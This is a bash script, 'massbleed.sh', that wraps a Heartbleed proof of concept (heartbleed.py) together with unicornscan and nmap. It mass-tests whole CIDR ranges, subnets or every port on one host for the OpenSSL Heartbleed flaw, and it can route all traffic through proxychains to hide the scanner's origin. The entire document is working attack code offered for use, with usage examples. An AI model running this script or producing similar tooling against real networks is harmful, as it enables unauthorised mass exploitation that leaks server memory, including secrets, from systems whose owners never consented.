Mass Bleed 20140423

`#!/bin/bash  
# massbleed.sh 20140423 by 1N3  
# http://treadstonesecurity.blogspot.ca  
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]  
#   
# This script has four main functions with the ability to proxy all connections:  
# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)  
# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)  
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)  
# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet)  
#  
# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.   
# USAGE EXAMPLES:  
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)  
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)  
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)  
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)  
#  
# Prerequisites:  
# Is the heartbleed POC present?   
# Is unicornscan installed?  
# Is nmap installed?  
  
echo "(--==== http://treadstonesecurity.blogspot.ca"  
echo "(--==== massbleed.sh 20140423 by 1N3"  
echo ""  
  
HEARTBLEED=`ls heartbleed.py`  
UNICORNSCAN=`which unicornscan`  
NMAP=`which nmap`  
RANGE=$1  
ALL_PORTS=$2  
CUSTOM_PORT=$3  
PROXY=$4  
PORT_RANGE="1-65000"  
  
if [ "$HEARTBLEED" != "heartbleed.py" ]; then  
echo "(--==== heartbleed.py not found!"  
echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py"  
exit  
fi  
  
if [ "$UNICORNSCAN" == "" ]; then  
echo "(--==== unicornscan not installed! Exiting..."  
exit  
fi  
  
if [ "$NMAP" == "" ]; then  
echo "(--==== nmap not installed! Exiting..."  
exit  
fi  
  
if [ -z "$1" ]; then  
echo "(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"  
exit  
fi  
  
if [ "$PROXY" = "proxy" ]; then  
echo "(--==== scanning via proxy..."  
if [ "$ALL_PORTS" = "single" ]; then  
if [ "$CUSTOM_PORT" != "0" ]; then  
echo "(--==== Checking $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null  
else  
for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;   
do echo "(--==== Checking $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;   
done;  
fi  
fi  
if [ "$ALL_PORTS" = "subnet" ]; then  
for a in {1..254};   
do   
echo "Scanning: $RANGE$a"  
for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;  
do   
echo "$RANGE$a:$b"  
proxychains python heartbleed.py $RANGE$a -p $b | grep Server;  
done;  
done;  
fi  
if [ "$ALL_PORTS" = "port" ]; then  
for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;   
do echo "(--==== Checking:" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server;   
done;  
else   
for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;   
do echo "(--==== Checking:" $a && proxychains python heartbleed.py $a -p 443 | grep Server;   
done  
fi  
else   
if [ "$ALL_PORTS" = "single" ]; then  
for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;   
do echo "(--==== Checking $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;   
done;  
fi  
if [ "$ALL_PORTS" = "subnet" ]; then  
for a in {1..254};   
do   
echo "Scanning: $RANGE$a"  
for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;  
do   
echo "$RANGE$a:$b"  
python heartbleed.py $RANGE$a -p $b | grep Server;  
done;  
done;  
fi  
if [ "$ALL_PORTS" = "port" ]; then  
for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;   
do echo "(--==== Checking:" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server;   
done;  
else   
for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;   
do echo "(--==== Checking:" $a && python heartbleed.py $a -p 443 | grep Server;   
done  
fi  
fi  
  
echo "(--==== scan complete!"  
exit   
`